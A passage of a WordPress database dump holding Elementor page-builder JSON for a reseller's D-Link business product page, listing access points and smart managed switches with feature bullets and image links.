Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7346,3378,'_elementor_version','2.5.14'),(7347,3378,'_elementor_edit_mode','builder'),(7351,3379,'_elementor_template_type','post'),(7352,3379,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE 